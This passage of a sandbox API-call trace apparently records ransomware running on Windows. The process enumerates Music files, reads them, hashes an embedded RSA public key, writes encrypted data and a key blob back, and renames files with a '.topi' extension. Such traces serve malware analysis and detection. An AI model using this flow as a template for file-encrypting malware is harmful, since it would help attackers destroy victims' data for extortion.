out: hHeap=0x680000) returned 1 [0095.203] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9408 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93f0 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93c0 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93a8 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f19b0 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.204] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x16d14, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x16d14, lpOverlapped=0x0) returned 1 [0095.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.204] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x16d19, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.204] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.205] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.205] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.205] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.205] CloseHandle (hObject=0x6a8) returned 1 [0095.219] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.219] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.219] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7bJ1P.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7bj1p.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7bJ1P.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7bj1p.m4a.topi")) returned 1 [0095.223] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.223] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.223] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.225] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.225] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0095.225] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.225] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.225] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.225] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned=".ini" [0095.225] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.225] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4595ae0, ftCreationTime.dwHighDateTime=0x1d5c296, ftLastAccessTime.dwLowDateTime=0x42e43ce0, ftLastAccessTime.dwHighDateTime=0x1d5baa2, ftLastWriteTime.dwLowDateTime=0x42e43ce0, ftLastWriteTime.dwHighDateTime=0x1d5baa2, nFileSizeHigh=0x0, nFileSizeLow=0xff29, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FM IT1z0r5x6P3.m4a", cAlternateFileName="FMIT1Z~1.M4A")) returned 1 [0095.225] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.225] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.225] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.225] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FM IT1z0r5x6P3.m4a") returned=".m4a" [0095.226] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FM IT1z0r5x6P3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fm it1z0r5x6p3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.226] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=65321) returned 1 [0095.226] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.230] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xff03, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.230] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.231] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.231] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.231] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xff29, lpOverlapped=0x0) returned 1 [0095.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.232] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.233] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.233] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.233] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.233] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.233] GetLastError () returned 0x0 [0095.234] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.234] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.234] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.234] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.234] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xff30) returned 0x9a06a00 [0095.234] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f19b0 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93a8 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f19f8 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93c0 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93f0 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9408 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.235] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93f0 | out: hHeap=0x680000) returned 1 [0095.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9408 | out: hHeap=0x680000) returned 1 [0095.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9408 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d93f0 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9408 | out: hHeap=0x680000) returned 1 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93f0 | out: hHeap=0x680000) returned 1 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.236] GetCurrentThreadId () returned 0x8c4 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5da0 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.236] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.236] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.237] GetCurrentThreadId () returned 0x8c4 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93f0 [0095.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.237] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9408 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93d8 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9420 [0095.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0095.238] HeapFree (in: 